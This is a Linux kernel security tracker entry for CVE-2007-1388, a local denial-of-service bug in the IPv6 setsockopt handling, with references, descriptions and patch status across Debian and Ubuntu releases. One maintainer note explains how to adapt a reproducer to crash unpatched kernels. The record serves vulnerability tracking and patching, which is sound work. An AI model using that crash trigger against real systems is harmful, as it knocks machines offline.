Candidate: CVE-2007-1388 References: http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.20.y.git;a=commit;h=4cabf6ba5496bc4a5a59871693145880b240b07b http://bugzilla.kernel.org/show_bug.cgi?id=8155 Description: The do_ipv6_setsockopt function in net/ipv6/ipv6_sockglue.c in Linux kernel 2.6.17, and possibly other versions, allows local users to cause a denial of service (oops) by calling setsockopt with the IPV6_RTHDR option name and possibly a zero option length or invalid option value, which triggers a NULL pointer dereference. Ubuntu-Description: Gabriel Campana discovered that the do_ipv6_setsockopt() function did not sufficiently verifiy option values for IPV6_RTHDR. A local attacker could exploit this to trigger a kernel crash. Notes: dannf> Reproducer in the RH bug doesn't work on debian as-is - you need to use a hardcoded '57' instead of IPV6_RTHDR. That allows you to trigger an oops on unpatched 2.6.18-era kernels, but it is not reproducible in 2.4.27/2.6.8 Bugs: upstream: released (2.6.21-rc4) linux-2.6: released (2.6.21-1) 2.6.18-etch-security: released (2.6.18.dfsg.1-12) [bugfix/ipv6_getsockopt_sticky-null-opt.patch] 2.6.8-sarge-security: N/A 2.4.27-sarge-security: N/A 2.6.15-dapper-security: released (2.6.15-28.54) 2.6.17-edgy-security: released (2.6.17.1-11.38) 2.6.20-feisty-security: released (2.6.20-16.28)